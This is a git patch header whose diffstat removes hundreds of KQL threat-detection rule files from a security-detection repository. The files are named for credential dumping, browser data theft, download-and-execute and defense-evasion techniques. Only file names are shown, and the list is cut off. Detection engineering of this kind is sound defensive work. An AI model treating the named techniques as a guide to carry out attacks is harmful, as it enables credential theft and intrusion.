From 9b6c4799fec5f908de82e8f2c826b8e18174c255 Mon Sep 17 00:00:00 2001 
From: Kaiber_wsl_desktop Date: Sat, 15 Nov 2025 17:38:36 +1100 Subject: [PATCH 01/17] Added various items to the project to improve it. A more robust Python script for conversions with better error handling, utilising the newest KQL backend, requirements.txt. and much better documentation. --- Collection/7Zip_Compressing_Dump_Files.kql | 7 - Collection/Audio_Capture_via_PowerShell.kql | 7 - .../Audio_Capture_via_SoundRecorder.kql | 7 - .../Automated_Collection_Command_Prompt.kql | 7 - ...h_Password_for_Exfiltration_With_7-ZIP.kql | 7 - ..._Password_for_Exfiltration_With_WINZIP.kql | 7 - .../Compressed_File_Creation_Via_Tar.EXE.kql | 9 - ...Compressed_File_Extraction_Via_Tar.EXE.kql | 9 - ...rom_Or_To_Admin_Share_Or_Sysvol_Folder.kql | 7 - .../CredUI.DLL_Loaded_By_Uncommon_Process.kql | 7 - .../Data_Copied_To_Clipboard_Via_Clip.EXE.kql | 7 - .../Esentutl_Steals_Browser_Information.kql | 7 - .../Exchange_PowerShell_Snap-Ins_Usage.kql | 7 - ...iles_Added_To_An_Archive_Using_Rar.EXE.kql | 7 - ...ous_Output_Via_Compress-Archive_Cmdlet.kql | 9 - Collection/PUA_-_Mouse_Lock_Execution.kql | 7 - ...ed_Compressed_File_Extraction_Via_7Zip.kql | 7 - ...owerShell_Get-Clipboard_Cmdlet_Via_CLI.kql | 7 - ...ge_with_Password_and_Compression_Level.kql | 7 - ...rmation_for_Export_with_Command_Prompt.kql | 7 - ...Remote_Utilities_RAT_(RURAT)_Execution.kql | 7 - ...SQLite_Chromium_Profile_Data_DB_Access.kql | 7 - .../SQLite_Firefox_Profile_Data_DB_Access.kql | 7 - .../Screen_Capture_Activity_Via_Psr.EXE.kql | 7 - ...uspicious_Camera_and_Microphone_Access.kql | 7 - ...lation_Of_Default_Accounts_Via_Net.EXE.kql | 7 - ...tabase_Credentials_Dump_Via_Sqlcmd.EXE.kql | 7 - ...Veeam_Backup_Database_Suspicious_Query.kql | 7 - ..._-_DisableAIDataAnalysis_Value_Deleted.kql | 10 - ...dows_Recall_Feature_Enabled_-_Registry.kql | 10 - ...ows_Recall_Feature_Enabled_Via_Reg.EXE.kql | 11 - Collection/Winrar_Compressing_Dump_Files.kql | 7 - ...inrar_Execution_in_Non-Standard_Folder.kql | 7 - 
...l_Cmdlets_Execution_-_ProccessCreation.kql | 7 - ...edential_Files_By_Uncommon_Application.kql | 10 - ...e_Sysvol_Files_By_Uncommon_Application.kql | 7 - ...l_History_File_By_Uncommon_Application.kql | 9 - ...PI_Master_Keys_By_Uncommon_Application.kql | 9 - ...ctory_Database_Snapshot_Via_ADExplorer.kql | 7 - .../Automated_Collection_Command_Prompt.kql | 7 - .../Browser_Started_with_Remote_Debugging.kql | 7 - .../Capture_Credentials_with_Rpcping.exe.kql | 7 - .../Certificate_Exported_Via_PowerShell.kql | 7 - ...g_Sensitive_Files_with_Credential_Data.kql | 7 - .../CrackMapExec_File_Indicators.kql | 7 - .../CredUI.DLL_Loaded_By_Uncommon_Process.kql | 7 - .../Cred_Dump_Tools_Dropped_Files.kql | 7 - ...Manager_Access_By_Uncommon_Application.kql | 9 - .../Dropping_Of_Password_Filter_DLL.kql | 7 - .../Dumping_Process_via_Sqldumper.exe.kql | 7 - ...Dumping_of_Sensitive_Hives_Via_Reg.EXE.kql | 7 - ...umeration_for_3rd_Party_Creds_From_CLI.kql | 7 - ...numeration_for_Credentials_in_Registry.kql | 10 - .../Esentutl_Gather_Credentials.kql | 7 - ...entutl_Volume_Shadow_Copy_Service_Keys.kql | 7 - Credential Access/Findstr_GPP_Passwords.kql | 7 - .../HackTool_-_ADCSPwn_Execution.kql | 7 - .../HackTool_-_Certify_Execution.kql | 7 - .../HackTool_-_Certipy_Execution.kql | 7 - .../HackTool_-_CrackMapExec_Execution.kql | 7 - ...ckTool_-_CrackMapExec_Process_Patterns.kql | 7 - ..._-_Dumpert_Process_Dumper_Default_File.kql | 7 - ...l_-_Hashcat_Password_Cracker_Execution.kql | 7 - ..._-_Hydra_Password_Bruteforce_Execution.kql | 7 - .../HackTool_-_Inveigh_Execution.kql | 7 - .../HackTool_-_KrbRelayUp_Execution.kql | 7 - .../HackTool_-_KrbRelay_Execution.kql | 7 - .../HackTool_-_Mimikatz_Execution.kql | 7 - ..._Pypykatz_Credentials_Dumping_Activity.kql | 7 - .../HackTool_-_Quarks_PwDump_Execution.kql | 7 - .../HackTool_-_Rubeus_Execution.kql | 7 - .../HackTool_-_SafetyKatz_Execution.kql | 7 - .../HackTool_-_SecurityXploded_Execution.kql | 7 - .../HackTool_-_WinPwn_Execution.kql | 8 - 
.../Hacktool_Execution_-_PE_Metadata.kql | 7 - ...ting_Of_Wifi_Credentials_Via_Netsh.EXE.kql | 7 - ...rectory_Diagnostic_Tool_(ntdsutil.exe).kql | 7 - .../LSASS_Dump_Keyword_In_CommandLine.kql | 8 - ...ess_Dump_Artefact_In_CrashDumps_Folder.kql | 7 - ...s_Memory_Dump_Creation_Via_Taskmgr.EXE.kql | 7 - .../LSASS_Process_Memory_Dump_Files.kql | 7 - ...Process_Reconnaissance_Via_Findstr.EXE.kql | 7 - ...Request_Via_DumpType_Registry_Settings.kql | 7 - ...soft_IIS_Connection_Strings_Decryption.kql | 7 - ...ft_IIS_Service_Account_Password_Dumped.kql | 7 - .../Mimikatz_Kirbi_File_Creation.kql | 7 - Credential Access/NPPSpy_Hacktool_Usage.kql | 7 - Credential Access/NTDS.DIT_Created.kql | 7 - ...IT_Creation_By_Uncommon_Parent_Process.kql | 7 - .../NTDS.DIT_Creation_By_Uncommon_Process.kql | 7 - .../NTDS_Exfiltration_Filename_Patterns.kql | 7 - ...neric_Credentials_Added_Via_Cmdkey.EXE.kql | 9 - ...rk_Trace_Capture_Started_Via_Netsh.EXE.kql | 7 - .../PUA_-_DIT_Snapshot_Viewer.kql | 7 - .../PUA_-_Mouse_Lock_Execution.kql | 7 - .../PUA_-_WebBrowserPassView_Execution.kql | 7 - ...uration_Reconnaissance_Via_Findstr.EXE.kql | 7 - Credential Access/PktMon.EXE_Execution.kql | 7 - .../Potential_Browser_Data_Stealing.kql | 10 - ...ttempt_Using_New_NetworkProvider_-_CLI.kql | 7 - ...ttempt_Using_New_NetworkProvider_-_REG.kql | 7 - ...ential_Dumping_Via_LSASS_Process_Clone.kql | 7 - ..._Via_LSASS_SilentProcessExit_Technique.kql | 7 - .../Potential_Credential_Dumping_Via_WER.kql | 7 - ...ealing_Via_Chromium_Headless_Debugging.kql | 7 - ...ential_LSASS_Process_Dump_Via_Procdump.kql | 9 - ..._Sniffing_Activity_Using_Network_Tools.kql | 10 - ..._For_Cached_Credentials_Via_Cmdkey.EXE.kql | 7 - ...ial_Remote_Credential_Dumping_Activity.kql | 7 - .../Potential_SAM_Database_Dump.kql | 7 - ...tential_SPN_Enumeration_Via_Setspn.EXE.kql | 7 - ...tial_Suspicious_Activity_Using_SeCEdit.kql | 7 - ...indows_Defender_Tampering_Via_Wmic.EXE.kql | 7 - ...ommand_Targeting_Teams_Sensitive_Files.kql | 9 
- ...con_Activity_Using_Log_Query_Utilities.kql | 9 - .../PowerShell_Get-Process_LSASS.kql | 7 - Credential Access/PowerShell_SAM_Copy.kql | 7 - ...s_Reconnaissance_Via_CommandLine_Tools.kql | 7 - ...ss_Access_via_TrolleyExpress_Exclusion.kql | 7 - .../Process_Memory_Dump_Via_Comsvcs.DLL.kql | 7 - ...rocess_Memory_Dump_via_RdrLeakDiag.EXE.kql | 7 - Credential Access/QuarksPwDump_Dump_File.kql | 7 - ...SQLite_Chromium_Profile_Data_DB_Access.kql | 7 - .../SQLite_Firefox_Profile_Data_DB_Access.kql | 7 - .../SafetyKatz_Default_Dump_Filename.kql | 7 - .../Sensitive_File_Dump_Via_Wbadmin.EXE.kql | 9 - ...e_Recovery_From_Backup_Via_Wbadmin.EXE.kql | 9 - ...tion_Using_Operating_Systems_Utilities.kql | 7 - ...ctory_Database_Snapshot_Via_ADExplorer.kql | 7 - .../Suspicious_Dump64.exe_Execution.kql | 7 - ...spicious_File_Event_With_Teams_Objects.kql | 7 - .../Suspicious_Key_Manager_Access.kql | 7 - ...ication_on_the_Printer_Spooler_Service.kql | 7 - ...Suspicious_Office_Token_Search_Via_CLI.kql | 7 - .../Suspicious_PFX_File_Creation.kql | 7 - ...icious_Process_Patterns_NTDS.DIT_Exfil.kql | 7 - .../Suspicious_Reg_Add_Open_Command.kql | 7 - ...uspicious_SYSTEM_User_Process_Creation.kql | 7 - ...ious_SYSVOL_Domain_Group_Policy_Access.kql | 7 - .../Suspicious_Serv-U_Process_Pattern.kql | 7 - .../Suspicious_Unattend.xml_File_Access.kql | 9 - ...rectory_Diagnostic_Tool_(ntdsutil.exe).kql | 7 - .../Time_Travel_Debugging_Utility_Usage.kql | 7 - ...Travel_Debugging_Utility_Usage_-_Image.kql | 7 - .../Typical_HiveNightmare_SAM_File_Export.kql | 7 - .../Uncommon_Outbound_Kerberos_Connection.kql | 8 - ...ShadowCopy_Symlink_Creation_Via_Mklink.kql | 7 - .../WerFault_LSASS_Process_Memory_Dump.kql | 7 - .../Windows_Credential_Editor_Registry.kql | 7 - ...Credential_Manager_Access_via_VaultCmd.kql | 7 - ...tifier_Deleted_By_Uncommon_Application.kql | 7 - ...sions_to_Hide_Services_Via_Set-Service.kql | 7 - Defense Evasion/Abusing_Print_Executable.kql | 7 - 
...ook_Mail_Files_By_Uncommon_Application.kql | 10 - ..._Windows_Security_Center_Notifications.kql | 7 - .../Add_DisallowRun_Execution_to_Registry.kql | 7 - ...Add_Insecure_Download_Source_To_Winget.kql | 9 - .../Add_New_Download_Source_To_Winget.kql | 7 - ...spicious_New_Download_Source_To_Winget.kql | 7 - .../Add_SafeBoot_Keys_Via_Reg_Utility.kql | 7 - ....EXE_Execution_From_Uncommon_Directory.kql | 7 - .../AgentExecutor_PowerShell_Execution.kql | 7 - .../Allow_RDP_Remote_Assistance_Feature.kql | 7 - .../Amsi.DLL_Loaded_Via_LOLBIN_Process.kql | 7 - ...tion_Whitelisting_Bypass_via_Dxcap.exe.kql | 7 - .../Arbitrary_Command_Execution_Using_WSL.kql | 7 - ...r_Csproj_Code_Execution_Via_Dotnet.EXE.kql | 7 - ...bitrary_File_Download_Via_IMEWDBLD.EXE.kql | 7 - ...ary_File_Download_Via_MSEDGE_PROXY.EXE.kql | 7 - ...bitrary_File_Download_Via_MSOHTMED.EXE.kql | 7 - .../Arbitrary_File_Download_Via_MSPUB.EXE.kql | 7 - ...File_Download_Via_PresentationHost.EXE.kql | 7 - ...bitrary_File_Download_Via_Squirrel.EXE.kql | 8 - ...Arbitrary_MSI_Download_Via_Devinit.EXE.kql | 7 - Defense Evasion/AspNetCompiler_Execution.kql | 7 - ...sembly_Loading_Via_CL_LoadAssembly.ps1.kql | 7 - Defense Evasion/Atbroker_Registry_Change.kql | 7 - .../Audit_Policy_Tampering_Via_Auditpol.kql | 9 - ...Tampering_Via_NT_Resource_Kit_Auditpol.kql | 9 - ...cial_Processes_With_Improper_Arguments.kql | 10 - ...64_Encoded_PowerShell_Command_Detected.kql | 7 - ...y_Proxy_Execution_Via_Dotnet-Trace.EXE.kql | 7 - .../Blackbyte_Ransomware_Registry.kql | 7 - .../Bypass_UAC_Using_DelegateExecute.kql | 7 - .../Bypass_UAC_Using_SilentCleanup_Task.kql | 10 - Defense Evasion/Bypass_UAC_via_CMSTP.kql | 7 - .../Bypass_UAC_via_WSReset.exe.kql | 7 - .../C#_IL_Code_Compilation_Via_Ilasm.EXE.kql | 7 - .../CMSTP_Execution_Process_Creation.kql | 7 - .../CMSTP_Execution_Registry_Event.kql | 7 - ...CMSTP_UAC_Bypass_via_COM_Object_Access.kql | 7 - .../COM_Object_Execution_via_Xwizard.EXE.kql | 9 - 
.../Certificate_Exported_Via_Certutil.EXE.kql | 7 - ...ccount_Associated_with_the_FAX_Service.kql | 7 - ...Channel_Access_Permission_Via_Registry.kql | 7 - Defense Evasion/Change_the_Fax_Dll.kql | 7 - .../ClickOnce_Trust_Prompt_Tampering.kql | 7 - .../CobaltStrike_Load_by_Rundll32.kql | 7 - ...ation_Via_MODE.COM_To_Russian_Language.kql | 9 - .../Code_Execution_via_Pcwutl.dll.kql | 7 - Defense Evasion/Control_Panel_Items.kql | 7 - ...ureString_Cmdlet_Usage_Via_CommandLine.kql | 7 - Defense Evasion/CreateDump_Process_Dump.kql | 7 - ...Created_Files_by_Microsoft_Sync_Center.kql | 7 - .../Creation_Of_Non-Existent_System_DLL.kql | 9 - ...n_of_an_WerFault.exe_in_Unusual_Folder.kql | 7 - ...ion_Form_Potentially_Suspicious_Parent.kql | 7 - .../Curl_Download_And_Execute_Combination.kql | 7 - ..._File_Open_Handler_Executes_PowerShell.kql | 7 - .../DHCP_Callout_DLL_Installation.kql | 7 - ...Execution_Via_Register-cimprovider.exe.kql | 7 - .../DLL_Execution_via_Rasautou.exe.kql | 7 - ...stem_Process_From_Suspicious_Locations.kql | 7 - ...From_Suspicious_Location_Via_Cmspt.EXE.kql | 7 - Defense Evasion/DLL_Loaded_via_CertOC.EXE.kql | 7 - ..._Hijackig_Via_Additional_Space_in_Path.kql | 9 - .../DLL_Sideloading_Of_ShellChromeAPI.DLL.kql | 9 - ...DLL_Sideloading_by_VMware_Xfer_Utility.kql | 7 - .../DNS-over-HTTPS_Enabled_by_Registry.kql | 10 - ...Driver_Installation_OR_Starting_Of_VMs.kql | 7 - ..._of_PowerShell_Execution_via_Sqlps.exe.kql | 9 - .../DeviceCredentialDeployment_Execution.kql | 7 - ...launcher.exe_Executes_Specified_Binary.kql | 7 - ...ibrary_Sdiageng.DLL_Loaded_By_Msdt.EXE.kql | 7 - .../Directory_Removal_Via_Rmdir.kql | 11 - ...ministrative_Share_Creation_at_Startup.kql | 7 - ...Network_Protection_on_Windows_Defender.kql | 7 - ..._Internal_Tools_or_Feature_in_Registry.kql | 7 - .../Disable_Macro_Runtime_Scan_Scope.kql | 7 - ...crosoft_Defender_Firewall_via_Registry.kql | 7 - ...ble_PUA_Protection_on_Windows_Defender.kql | 7 - 
...rivacy_Settings_Experience_in_Registry.kql | 7 - ..._Tamper_Protection_on_Windows_Defender.kql | 7 - ...indows_Defender_AV_Security_Monitoring.kql | 7 - ...nder_Functionalities_Via_Registry_Keys.kql | 7 - ...ble_Windows_Event_Logging_Via_Registry.kql | 7 - .../Disable_Windows_Firewall_by_Registry.kql | 7 - .../Disable_Windows_IIS_HTTP_Logging.kql | 7 - ..._Windows_Security_Center_Notifications.kql | 7 - Defense Evasion/Disable_of_ETW_Trace.kql | 7 - .../Disabled_IE_Security_Features.kql | 7 - Defense Evasion/Disabled_Volume_Snapshots.kql | 7 - .../Disabled_Windows_Defender_Eventlog.kql | 7 - ...ion_From_Potential_Suspicious_Location.kql | 7 - ..._-_Uncommon_Script_Extension_Execution.kql | 9 - .../Dism_Remove_Online_Package.kql | 7 - ...splaying_Hidden_Files_Feature_Disabled.kql | 9 - ...erServer_Function_Call_Via_Msiexec.EXE.kql | 7 - .../Dllhost.EXE_Execution_Anomaly.kql | 7 - ...ork_Connection_To_Non-Local_IP_Address.kql | 10 - ...naries_Into_Spool_Drivers_Color_Folder.kql | 7 - Defense Evasion/DumpMinitool_Execution.kql | 7 - .../DumpStack.log_Defender_Evasion.kql | 7 - .../Dynamic_.NET_Compilation_Via_Csc.EXE.kql | 7 - .../Dynamic_CSharp_Compile_Artefact.kql | 10 - .../ETW_Logging_Disabled_For_SCM.kql | 7 - .../ETW_Logging_Disabled_For_rpcrt4.dll.kql | 7 - .../ETW_Logging_Tamper_In_.NET_Processes.kql | 7 - .../EVTX_Created_In_Uncommon_Location.kql | 10 - Defense Evasion/Enable_LM_Hash_Storage.kql | 9 - .../Enable_LM_Hash_Storage_-_ProcCreation.kql | 9 - ...ocal_Manifest_Installation_With_Winget.kql | 7 - ...mous_Computer_-_AllowAnonymousCallback.kql | 7 - ...ing_COR_Profiler_Environment_Variables.kql | 7 - .../EventLog_EVTX_File_Deleted.kql | 7 - ...ange_PowerShell_Cmdlet_History_Deleted.kql | 7 - .../Execute_Code_with_Pester.bat.kql | 7 - ...Execute_Code_with_Pester.bat_as_Parent.kql | 7 - .../Execute_Files_with_Msdeploy.exe.kql | 7 - .../Execute_From_Alternate_Data_Streams.kql | 7 - .../Execute_MSDT_Via_Answer_File.kql | 7 - 
...Execute_Pcwrun.EXE_To_Leverage_Follina.kql | 7 - .../Execution_DLL_of_Choice_Using_WAB.EXE.kql | 7 - .../Execution_Of_Non-Existing_File.kql | 7 - .../Execution_from_Suspicious_Folder.kql | 7 - ...tion_of_Suspicious_File_Type_Extension.kql | 9 - .../Execution_via_WorkFolders.exe.kql | 7 - .../Execution_via_stordiag.exe.kql | 7 - Defense Evasion/Explorer_NOUACCHECK_Flag.kql | 7 - .../Explorer_Process_Tree_Break.kql | 9 - .../Fax_Service_DLL_Search_Order_Hijack.kql | 7 - .../File_Deleted_Via_Sysinternals_SDelete.kql | 7 - Defense Evasion/File_Deletion_Via_Del.kql | 11 - ...ile_Download_Using_ProtocolHandler.exe.kql | 8 - .../File_Download_Via_Bitsadmin.kql | 7 - ...itsadmin_To_A_Suspicious_Target_Folder.kql | 7 - ...Bitsadmin_To_An_Uncommon_Target_Folder.kql | 7 - .../File_Download_Via_InstallUtil.EXE.kql | 8 - ...load_Via_Windows_Defender_MpCmpRun.EXE.kql | 7 - ...ile_Encoded_To_Base64_Via_Certutil.EXE.kql | 7 - ...ion_Encoded_To_Base64_Via_Certutil.EXE.kql | 7 - ...ous_Extension_Downloaded_Via_Bitsadmin.kql | 7 - ..._Process_Name_In_Unsuspected_Locations.kql | 9 - .../Filter_Driver_Unloaded_Via_Fltmc.EXE.kql | 7 - .../Findstr_Launching_.lnk_File.kql | 7 - .../Firewall_Disabled_via_Netsh.EXE.kql | 7 - .../Firewall_Rule_Deleted_Via_Netsh.EXE.kql | 7 - .../Firewall_Rule_Update_Via_Netsh.EXE.kql | 7 - ...Guard_ProtectedFolders_List_-_Registry.kql | 7 - ...orfiles.EXE_Child_Process_Masquerading.kql | 8 - .../Fsutil_Suspicious_Invocation.kql | 9 - Defense Evasion/Gpscript_Execution.kql | 7 - .../Greedy_File_Deletion_Using_Del.kql | 7 - Defense Evasion/HH.EXE_Execution.kql | 7 - ...L_Help_HH.EXE_Suspicious_Child_Process.kql | 7 - ...ackTool_-_Covenant_PowerShell_Launcher.kql | 7 - ..._-_CrackMapExec_PowerShell_Obfuscation.kql | 7 - ..._DInjector_PowerShell_Cradle_Execution.kql | 7 - .../HackTool_-_EDRSilencer_Execution.kql | 8 - ...ackTool_-_Empire_PowerShell_UAC_Bypass.kql | 7 - ...ackTool_-_F-Secure_C3_Load_by_Rundll32.kql | 7 - 
...Rootkit_Detector_and_Remover_Execution.kql | 7 - .../HackTool_-_PowerTool_Execution.kql | 7 - ...-_RedMimicry_Winnti_Playbook_Execution.kql | 7 - .../HackTool_-_SharpEvtMute_Execution.kql | 7 - ...ackTool_-_SharpImpersonation_Execution.kql | 7 - .../HackTool_-_Stracciatella_Execution.kql | 7 - .../HackTool_-_WinPwn_Execution.kql | 8 - ...l_-_Wmiexec_Default_Powershell_Command.kql | 7 - .../HackTool_-_XORDump_Execution.kql | 7 - ...e_Schedule_Task_Via_Index_Value_Tamper.kql | 9 - .../Hiding_Files_with_Attrib.exe.kql | 7 - ...count_Via_SpecialAccounts_Registry_Key.kql | 7 - ...visor_Enforced_Code_Integrity_Disabled.kql | 7 - ..._To_MyComputer_Zone_For_HTTP_Protocols.kql | 8 - ...mputer_Zone_For_HTTP_Protocols_Via_CLI.kql | 8 - .../IIS_WebServer_Access_Logs_Deleted.kql | 7 - ...Interchange_Format_File_Via_Ldifde.EXE.kql | 8 - .../Imports_Registry_Key_From_a_File.kql | 7 - .../Imports_Registry_Key_From_an_ADS.kql | 7 - ...cution_By_Program_Compatibility_Wizard.kql | 7 - ...xecution_From_Script_File_Via_Bash.EXE.kql | 9 - ..._Inline_Command_Execution_Via_Bash.EXE.kql | 9 - .../InfDefaultInstall.exe_.inf_Execution.kql | 7 - ...itive_Subfolder_Search_Via_Findstr.EXE.kql | 8 - ..._New_Package_Via_Winget_Local_Manifest.kql | 10 - ...lorer_DisableFirstRunCustomize_Enabled.kql | 8 - .../Invoke-Obfuscation_CLIP+_Launcher.kql | 7 - ...nvoke-Obfuscation_COMPRESS_OBFUSCATION.kql | 7 - ...-Obfuscation_Obfuscated_IEX_Invocation.kql | 7 - .../Invoke-Obfuscation_STDIN+_Launcher.kql | 7 - ...Obfuscation_VAR++_LAUNCHER_OBFUSCATION.kql | 7 - .../Invoke-Obfuscation_VAR+_Launcher.kql | 7 - .../Invoke-Obfuscation_Via_Stdin.kql | 7 - .../Invoke-Obfuscation_Via_Use_Clip.kql | 7 - .../Invoke-Obfuscation_Via_Use_MSHTA.kql | 7 - .../JScript_Compiler_Execution.kql | 9 - ...Kavremover_Dropped_Binary_LOLBIN_Usage.kql | 7 - .../Kernel_Memory_Dump_Via_LiveKD.kql | 7 - ...OL-Binary_Copied_From_System_Directory.kql | 8 - ...SA_PPL_Protection_Disabled_Via_Reg.EXE.kql | 7 - 
.../Launch-VsDevShell.PS1_Proxy_Execution.kql | 7 - ...Legitimate_Application_Dropped_Archive.kql | 7 - ...itimate_Application_Dropped_Executable.kql | 7 - .../Legitimate_Application_Dropped_Script.kql | 7 - Defense Evasion/LiveKD_Driver_Creation.kql | 7 - ...KD_Driver_Creation_By_Uncommon_Process.kql | 7 - ...LiveKD_Kernel_Memory_Dump_File_Created.kql | 7 - ...f_RstrtMgr.DLL_By_A_Suspicious_Process.kql | 10 - ...Of_RstrtMgr.DLL_By_An_Uncommon_Process.kql | 10 - .../Lolbin_Runexehelper_Use_As_Proxy.kql | 7 - .../Lolbin_Ssh.exe_Use_As_Proxy.kql | 7 - .../Lolbin_Unregmp2.exe_Use_As_Proxy.kql | 7 - .../MSHTA_Suspicious_Execution_01.kql | 7 - ...d_In_A_Potentially_Suspicious_Document.kql | 7 - ...ropped_in_the_Teams_or_OneDrive_Folder.kql | 9 - ...on_by_Microsoft_Visual_Studio_Debugger.kql | 10 - ...nents_File_Execution_by_TAEF_Detection.kql | 9 - ...inject_Inject_DLL_Into_Running_Process.kql | 7 - .../MaxMpxCt_Registry_Value_Changed.kql | 10 - .../Microsoft_Office_DLL_Sideload.kql | 7 - ...crosoft_Office_Protected_View_Disabled.kql | 7 - ..._Center_Suspicious_Network_Connections.kql | 7 - .../Microsoft_Workflow_Compiler_Execution.kql | 7 - .../Modification_of_IE_Registry_Settings.kql | 7 - .../Modify_Group_Policy_Settings.kql | 7 - .../Monitoring_For_Persistence_Via_BITS.kql | 11 - ...LL_RunHTMLApplication_Suspicious_Usage.kql | 8 - Defense Evasion/MsiExec_Web_Install.kql | 7 - .../Msiexec_Quiet_Installation.kql | 9 - Defense Evasion/Msxsl.EXE_Execution.kql | 9 - ...enAssemblyUsageLog_Registry_Key_Tamper.kql | 10 - .../NetNTLM_Downgrade_Attack_-_Registry.kql | 7 - ..._Policy_on_Microsoft_Defender_Firewall.kql | 7 - ..._Connection_Initiated_By_AddinUtil.EXE.kql | 9 - ...k_Connection_Initiated_By_Regsvr32.EXE.kql | 7 - ...k_Connection_Initiated_Via_Notepad.EXE.kql | 10 - ..._Custom_DB_Path_Registry_Configuration.kql | 7 - ...Custom_VBScript_Registry_Configuration.kql | 7 - ...ustom_WMI_Query_Registry_Configuration.kql | 7 - .../New_DLL_Registered_Via_Odbcconf.EXE.kql | 
7 - ...New_DNS_ServerLevelPluginDll_Installed.kql | 7 - ...evelPluginDll_Installed_Via_Dnscmd.EXE.kql | 7 - .../New_File_Association_Using_Exefile.kql | 7 - .../New_Firewall_Rule_Added_Via_Netsh.EXE.kql | 7 - .../New_PortProxy_Registry_Entry_Added.kql | 7 - ...rt_Forwarding_Rule_Added_Via_Netsh.EXE.kql | 7 - .../New_Process_Created_Via_Taskmgr.EXE.kql | 7 - ..._Certificate_Installed_Via_CertMgr.EXE.kql | 9 - ...Certificate_Installed_Via_Certutil.EXE.kql | 9 - Defense Evasion/Node_Process_Executions.kql | 7 - ...-privileged_Usage_of_Reg_or_Powershell.kql | 7 - ...hell_Download_Cradle_-_ProcessCreation.kql | 7 - .../NtdllPipe_Like_Activity_Execution.kql | 7 - .../OceanLotus_Registry_Activity.kql | 7 - .../Odbcconf.EXE_Suspicious_DLL_Location.kql | 7 - .../Office_Macros_Warning_Disabled.kql | 7 - .../OilRig_APT_Registry_Persistence.kql | 7 - ...nt_File_Dropped_In_Suspicious_Location.kql | 7 - ...OpenWith.exe_Executes_Specified_Binary.kql | 7 - ...work_Connection_Initiated_By_Cmstp.EXE.kql | 9 - ...k_Connection_To_Public_IP_Via_Winlogon.kql | 7 - ...ntMailRules_Setting_Enabled_-_Registry.kql | 7 - ...olicyTest_Creation_By_Uncommon_Process.kql | 7 - .../PUA_-_AdvancedRun_Execution.kql | 7 - ...PUA_-_AdvancedRun_Suspicious_Execution.kql | 7 - Defense Evasion/PUA_-_CleanWipe_Execution.kql | 7 - .../PUA_-_DefenderCheck_Execution.kql | 7 - ...ential_PE_Metadata_Tamper_Using_Rcedit.kql | 7 - ...nt_in_Public_Folder_Suspicious_Process.kql | 7 - ...rd_Provided_In_Command_Line_Of_Net.EXE.kql | 7 - .../Persistence_Via_New_SIP_Provider.kql | 7 - Defense Evasion/Ping_Hex_IP.kql | 7 - ...scalation_via_Weak_Service_Permissions.kql | 7 - .../Potential_7za.DLL_Sideloading.kql | 7 - .../Potential_AMSI_Bypass_Using_NULL_Bits.kql | 7 - ...ential_AMSI_Bypass_Via_.NET_Reflection.kql | 7 - .../Potential_AMSI_COM_Server_Hijacking.kql | 7 - .../Potential_AVKkid.DLL_Sideloading.kql | 7 - .../Potential_Adplus.EXE_Abuse.kql | 7 - ...ial_Antivirus_Software_DLL_Sideloading.kql | 7 - 
...cation_Whitelisting_Bypass_via_Dnx.EXE.kql | 9 - ..._Arbitrary_Code_Execution_Via_Node.EXE.kql | 7 - ...trary_Command_Execution_Using_Msdt.EXE.kql | 7 - ...rbitrary_Command_Execution_Via_FTP.EXE.kql | 7 - ...ntial_Arbitrary_DLL_Load_Using_Winword.kql | 7 - ...File_Download_Using_Office_Application.kql | 7 - ...Arbitrary_File_Download_Via_Cmdl32.EXE.kql | 10 - ...t_Manager_Settings_Associations_Tamper.kql | 7 - ...nt_Manager_Settings_Attachments_Tamper.kql | 7 - ...otential_AutoLogger_Sessions_Tampering.kql | 7 - .../Potential_Azure_Browser_SSO_Abuse.kql | 9 - ...inary_Impersonating_Sysinternals_Tools.kql | 7 - ...ial_Binary_Proxy_Execution_Via_Cdb.EXE.kql | 7 - ..._Proxy_Execution_Via_VSDiagnostics.EXE.kql | 7 - .../Potential_CCleanerDU.DLL_Sideloading.kql | 7 - ...al_CCleanerReactivator.DLL_Sideloading.kql | 7 - ...al_Chrome_Frame_Helper_DLL_Sideloading.kql | 7 - ...nd_Line_Path_Traversal_Evasion_Attempt.kql | 7 - ...ne_Obfuscation_Using_Escape_Characters.kql | 7 - ...e_Obfuscation_Using_Unicode_Characters.kql | 9 - ...jection_Or_Execution_Using_Tracker.exe.kql | 7 - ...tential_DLL_Sideloading_Of_DBGCORE.DLL.kql | 7 - ...tential_DLL_Sideloading_Of_DBGHELP.DLL.kql | 7 - ...Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql | 7 - ...tial_DLL_Sideloading_Using_Coregen.exe.kql | 7 - ..._Sideloading_Via_ClassicExplorer32.dll.kql | 7 - ...DLL_Sideloading_Via_DeviceEnroller.EXE.kql | 9 - ...Potential_DLL_Sideloading_Via_JsSchHlp.kql | 7 - ...ential_DLL_Sideloading_Via_VMware_Xfer.kql | 7 - ...ntial_DLL_Sideloading_Via_comctl32.dll.kql | 7 - ...tial_Defense_Evasion_Via_Binary_Rename.kql | 7 - ...Via_Rename_Of_Highly_Relevant_Binaries.kql | 7 - ...nse_Evasion_Via_Right-to-Left_Override.kql | 9 - .../Potential_EACore.DLL_Sideloading.kql | 7 - .../Potential_Edputil.DLL_Sideloading.kql | 7 - ...ded_PowerShell_Patterns_In_CommandLine.kql | 7 - ...ntial_EventLog_File_Location_Tampering.kql | 7 - ...al_Fake_Instance_Of_Hxtsr.EXE_Executed.kql | 10 - 
...d_Via_MS-AppInstaller_Protocol_Handler.kql | 9 - .../Potential_Goopdate.DLL_Sideloading.kql | 7 - ...ation_Via_NTFS_INDEX_ALLOCATION_Stream.kql | 8 - ...Via_NTFS_INDEX_ALLOCATION_Stream_-_CLI.kql | 8 - ...lyph_Attack_Using_Lookalike_Characters.kql | 10 - ...Using_Lookalike_Characters_in_Filename.kql | 10 - ..._Access_via_DLL_Search_Order_Hijacking.kql | 7 - .../Potential_Iviewers.DLL_Sideloading.kql | 7 - ...ential_LSASS_Process_Dump_Via_Procdump.kql | 9 - ...otential_LethalHTA_Technique_Execution.kql | 7 - .../Potential_Libvlc.DLL_Sideloading.kql | 7 - ...anage-bde.wsf_Abuse_To_Proxy_Execution.kql | 7 - ...ial_Memory_Dumping_Activity_Via_LiveKD.kql | 7 - .../Potential_Mfdetours.DLL_Sideloading.kql | 7 - .../Potential_Mftrace.EXE_Abuse.kql | 7 - .../Potential_Mpclient.DLL_Sideloading.kql | 7 - ....DLL_Sideloading_Via_Defender_Binaries.kql | 7 - .../Potential_MsiExec_Masquerading.kql | 7 - ...tential_NTLM_Coercion_Via_Certutil.EXE.kql | 7 - ...ential_NetWire_RAT_Activity_-_Registry.kql | 7 - 